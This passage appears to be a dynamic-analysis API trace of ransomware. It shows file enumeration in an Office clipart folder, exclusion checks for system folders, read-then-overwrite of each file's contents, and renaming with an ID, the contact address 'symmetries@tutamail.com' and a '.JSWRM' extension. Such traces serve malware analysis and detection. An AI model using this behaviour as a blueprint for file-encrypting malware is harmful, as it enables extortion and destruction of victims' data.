lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.277] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7178) returned 1 [0079.277] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c00) returned 0x205850 [0079.278] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c00, lpOverlapped=0x0) returned 1 [0079.288] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.288] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c00, lpOverlapped=0x0) returned 1 [0079.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.288] CloseHandle (hObject=0x314) returned 1 [0079.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0079.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0079.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0079.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0079.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0079.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.289] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0079.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.289] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00046_.WMF", cAlternateFileName="")) returned 1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2=".") returned 1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="..") returned 1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="...") returned 1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="windows") returned -1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="recovery") returned -1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="perflogs") returned -1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="documents and settings") returned 1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="system volume information") returned -1 [0079.289] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="msocache") returned -1 [0079.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00046_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00046_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00046_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00046_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00046_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00046_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.291] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1158) returned 1 [0079.291] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x480) returned 0x230a00 [0079.291] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x480, lpOverlapped=0x0) returned 1 [0079.292] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.292] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x480, lpOverlapped=0x0) returned 1 [0079.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0079.293] CloseHandle (hObject=0x314) returned 1 [0079.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0079.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0079.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0079.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0079.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.293] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.294] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x318, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00118_.WMF", cAlternateFileName="")) returned 1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2=".") returned 1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="..") returned 1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="...") returned 1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="windows") returned -1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="recovery") returned -1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="perflogs") returned -1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="documents and settings") returned 1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="system volume information") returned -1 [0079.294] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="msocache") returned -1 [0079.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00118_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00118_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00118_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00118_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00118_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00118_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.295] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=792) returned 1 [0079.295] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x310) returned 0x20b1f8 [0079.295] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x310, lpOverlapped=0x0) returned 1 [0079.297] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.297] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x310, lpOverlapped=0x0) returned 1 [0079.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0079.297] CloseHandle (hObject=0x314) returned 1 [0079.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0079.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0079.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0079.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0079.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0079.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.298] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0079.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.299] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00177_.WMF", cAlternateFileName="")) returned 1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2=".") returned 1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="..") returned 1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="...") returned 1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="windows") returned -1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="recovery") returned -1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="perflogs") returned -1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="documents and settings") returned 1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="system volume information") returned -1 [0079.299] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="msocache") returned -1 [0079.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0079.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00177_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00177_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00177_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0079.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0079.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00177_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00177_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00177_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0079.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.300] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1074) returned 1 [0079.300] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x430) returned 0x230a00 [0079.300] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x430, lpOverlapped=0x0) returned 1 [0079.301] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.301] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x430, lpOverlapped=0x0) returned 1 [0079.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0079.302] CloseHandle (hObject=0x314) returned 1 [0079.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.302] RtlAllocateHeap 